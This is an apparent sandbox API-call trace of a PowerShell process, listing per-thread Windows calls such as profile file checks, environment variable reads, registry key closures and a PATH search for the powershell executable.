	[0547.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0547.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0547.136] SetErrorMode (uMode=0x1) returned 0x1
	[0547.136] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d700 | out: lpFileInformation=0x12d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0547.136] SetErrorMode (uMode=0x1) returned 0x1
	[0547.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0547.137] SetErrorMode (uMode=0x1) returned 0x1
	[0547.137] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d700 | out: lpFileInformation=0x12d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0547.137] SetErrorMode (uMode=0x1) returned 0x1
	[0547.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0547.137] SetErrorMode (uMode=0x1) returned 0x1
	[0547.137] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d700 | out: lpFileInformation=0x12d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0547.137] SetErrorMode (uMode=0x1) returned 0x1
	[0547.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0547.138] SetErrorMode (uMode=0x1) returned 0x1
	[0547.138] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d700 | out: lpFileInformation=0x12d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0547.138] SetErrorMode (uMode=0x1) returned 0x1
	[0547.139] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0547.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.139] CoTaskMemFree (pv=0x3baac0) 
	[0547.139] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0547.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.139] CoTaskMemFree (pv=0x3baac0) 
	[0547.139] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0547.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.140] CoTaskMemFree (pv=0x3baac0) 
	[0547.140] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0547.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.140] CoTaskMemFree (pv=0x3baac0) 
	[0547.141] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0547.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.141] CoTaskMemFree (pv=0x3baac0) 
	[0547.142] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0547.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.142] CoTaskMemFree (pv=0x3baac0) 
	[0547.143] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0547.144] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12d8e0 | out: lpMode=0x12d8e0) returned 1
	[0547.144] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0547.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.144] CoTaskMemFree (pv=0x3baac0) 
	[0547.147] SetEvent (hEvent=0x310) returned 1
	[0547.147] SetEvent (hEvent=0x394) returned 1
	[0547.147] SetEvent (hEvent=0x2fc) returned 1
	[0547.147] SetEvent (hEvent=0x300) returned 1
	[0547.149] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0547.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.149] CoTaskMemFree (pv=0x3baac0) 
	[0547.149] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d638 | out: phkResult=0x12d638*=0x354) returned 0x0
	[0547.149] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12d5bc, lpData=0x0, lpcbData=0x12d5b8*=0x0 | out: lpType=0x12d5bc*=0x0, lpData=0x0, lpcbData=0x12d5b8*=0x0) returned 0x2

Thread:
	id = 239
	os_tid = 0xcf0


Thread:
	id = 251
	os_tid = 0xd40


Thread:
	id = 760
	os_tid = 0x1778


Thread:
	id = 762
	os_tid = 0x1788


Thread:
	id = 764
	os_tid = 0x179c


Thread:
	id = 795
	os_tid = 0x114


Thread:
	id = 801
	os_tid = 0x104c

	[0456.315] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0511.638] LocalFree (hMem=0x3689a0) returned 0x0
	[0511.639] CloseHandle (hObject=0x310) returned 1
	[0511.639] CloseHandle (hObject=0x13) returned 1
	[0511.687] CloseHandle (hObject=0xf) returned 1
	[0511.687] RegCloseKey (hKey=0x300) returned 0x0
	[0511.687] RegCloseKey (hKey=0x2fc) returned 0x0
	[0511.687] RegCloseKey (hKey=0x2f8) returned 0x0
	[0511.688] LocalFree (hMem=0x3689d0) returned 0x0
	[0511.688] RegCloseKey (hKey=0x324) returned 0x0
	[0523.819] RegCloseKey (hKey=0x324) returned 0x0
	[0529.796] RegCloseKey (hKey=0x324) returned 0x0
	[0539.399] RegCloseKey (hKey=0x390) returned 0x0
	[0539.400] RegCloseKey (hKey=0x38c) returned 0x0
	[0539.400] RegCloseKey (hKey=0x368) returned 0x0
	[0539.400] RegCloseKey (hKey=0x3a4) returned 0x0
	[0539.400] RegCloseKey (hKey=0x384) returned 0x0
	[0539.401] RegCloseKey (hKey=0x380) returned 0x0
	[0539.401] RegCloseKey (hKey=0x37c) returned 0x0
	[0539.401] RegCloseKey (hKey=0x378) returned 0x0
	[0539.401] RegCloseKey (hKey=0x374) returned 0x0
	[0539.402] RegCloseKey (hKey=0x370) returned 0x0
	[0539.402] RegCloseKey (hKey=0x36c) returned 0x0
	[0539.402] RegCloseKey (hKey=0x344) returned 0x0
	[0539.402] RegCloseKey (hKey=0x3a0) returned 0x0
	[0539.403] RegCloseKey (hKey=0x39c) returned 0x0
	[0539.403] RegCloseKey (hKey=0x364) returned 0x0
	[0539.403] RegCloseKey (hKey=0x360) returned 0x0
	[0539.403] RegCloseKey (hKey=0x35c) returned 0x0
	[0539.404] RegCloseKey (hKey=0x358) returned 0x0
	[0539.404] RegCloseKey (hKey=0x354) returned 0x0
	[0539.404] RegCloseKey (hKey=0x350) returned 0x0
	[0539.405] RegCloseKey (hKey=0x34c) returned 0x0
	[0539.405] RegCloseKey (hKey=0x348) returned 0x0
	[0539.405] RegCloseKey (hKey=0x398) returned 0x0
	[0539.405] RegCloseKey (hKey=0x338) returned 0x0
	[0539.406] RegCloseKey (hKey=0x334) returned 0x0
	[0539.406] RegCloseKey (hKey=0x330) returned 0x0
	[0539.406] RegCloseKey (hKey=0x32c) returned 0x0
	[0539.406] RegCloseKey (hKey=0x328) returned 0x0
	[0539.407] RegCloseKey (hKey=0x310) returned 0x0
	[0539.407] RegCloseKey (hKey=0x300) returned 0x0
	[0539.407] RegCloseKey (hKey=0x2fc) returned 0x0
	[0539.407] RegCloseKey (hKey=0x394) returned 0x0
	[0539.408] RegCloseKey (hKey=0x324) returned 0x0
	[0565.841] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 880
	os_tid = 0x1118


Thread:
	id = 1056
	os_tid = 0xd04

	[0549.062] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0549.066] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0549.071] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0549.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.071] CoTaskMemFree (pv=0x3baac0) 
	[0549.073] VirtualQuery (in: lpAddress=0x1c71ddc0, lpBuffer=0x1c71ec80, dwLength=0x30 | out: lpBuffer=0x1c71ec80*(BaseAddress=0x1c71d000, AllocationBase=0x1bd90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0549.076] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0549.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.076] CoTaskMemFree (pv=0x3baac0) 
	[0549.079] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0549.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.079] CoTaskMemFree (pv=0x3baac0) 
	[0549.082] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0549.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.082] CoTaskMemFree (pv=0x3baac0) 
	[0549.099] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0549.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.099] CoTaskMemFree (pv=0x3baac0) 
	[0549.102] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0549.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.102] CoTaskMemFree (pv=0x3baac0) 
	[0549.103] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0549.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.103] CoTaskMemFree (pv=0x3baac0) 
	[0550.060] VirtualQuery (in: lpAddress=0x1c71e070, lpBuffer=0x1c71ef30, dwLength=0x30 | out: lpBuffer=0x1c71ef30*(BaseAddress=0x1c71e000, AllocationBase=0x1bd90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0550.061] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0550.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0550.061] CoTaskMemFree (pv=0x3baac0) 
	[0550.064] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0550.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0550.064] CoTaskMemFree (pv=0x3baac0) 
	[0550.064] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0550.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0550.064] CoTaskMemFree (pv=0x3baac0) 
	[0550.065] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0550.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0550.065] CoTaskMemFree (pv=0x3baac0) 
	[0550.070] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0550.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0550.070] CoTaskMemFree (pv=0x3baac0) 
	[0551.784] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0551.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.784] CoTaskMemFree (pv=0x3baac0) 
	[0551.787] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0551.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.787] CoTaskMemFree (pv=0x3baac0) 
	[0551.788] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0551.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.788] CoTaskMemFree (pv=0x3baac0) 
	[0551.791] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0551.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.791] CoTaskMemFree (pv=0x3baac0) 
	[0551.792] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0551.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.793] CoTaskMemFree (pv=0x3baac0) 
	[0551.794] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0551.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.794] CoTaskMemFree (pv=0x3baac0) 
	[0551.796] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0551.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.796] CoTaskMemFree (pv=0x3baac0) 
	[0553.672] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0553.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0553.672] CoTaskMemFree (pv=0x3baac0) 
	[0555.906] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0555.906] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0555.906] CoTaskMemFree (pv=0x3baac0) 
	[0555.909] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0555.909] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0555.909] CoTaskMemFree (pv=0x3baac0) 
	[0555.909] CoTaskMemAlloc (cb=0x128) returned 0x3b5bd0
	[0555.909] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3b5bd0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0555.909] CoTaskMemFree (pv=0x3b5bd0) 
	[0555.914] CoTaskMemAlloc (cb=0x20e) returned 0x3c8440
	[0555.914] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3c8440 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0555.914] CoTaskMemFree (pv=0x3c8440) 
	[0555.918] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0555.919] SetErrorMode (uMode=0x1) returned 0x1
	[0555.922] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.851] SetErrorMode (uMode=0x1) returned 0x1
	[0557.852] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.853] SetErrorMode (uMode=0x1) returned 0x1
	[0557.853] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.860] SetErrorMode (uMode=0x1) returned 0x1
	[0557.862] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.862] SetErrorMode (uMode=0x1) returned 0x1
	[0557.862] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.869] SetErrorMode (uMode=0x1) returned 0x1
	[0557.870] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.870] SetErrorMode (uMode=0x1) returned 0x1
	[0557.870] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.878] SetErrorMode (uMode=0x1) returned 0x1
	[0557.879] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.879] SetErrorMode (uMode=0x1) returned 0x1
	[0557.879] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.887] SetErrorMode (uMode=0x1) returned 0x1
	[0557.888] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.889] SetErrorMode (uMode=0x1) returned 0x1
	[0557.889] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0559.894] SetErrorMode (uMode=0x1) returned 0x1
	[0559.895] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0559.895] SetErrorMode (uMode=0x1) returned 0x1
	[0559.896] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0559.904] SetErrorMode (uMode=0x1) returned 0x1
	[0559.905] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0559.905] SetErrorMode (uMode=0x1) returned 0x1
	[0559.905] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0559.913] SetErrorMode (uMode=0x1) returned 0x1
	[0559.914] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0559.915] SetErrorMode (uMode=0x1) returned 0x1
	[0559.915] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.452] SetErrorMode (uMode=0x1) returned 0x1
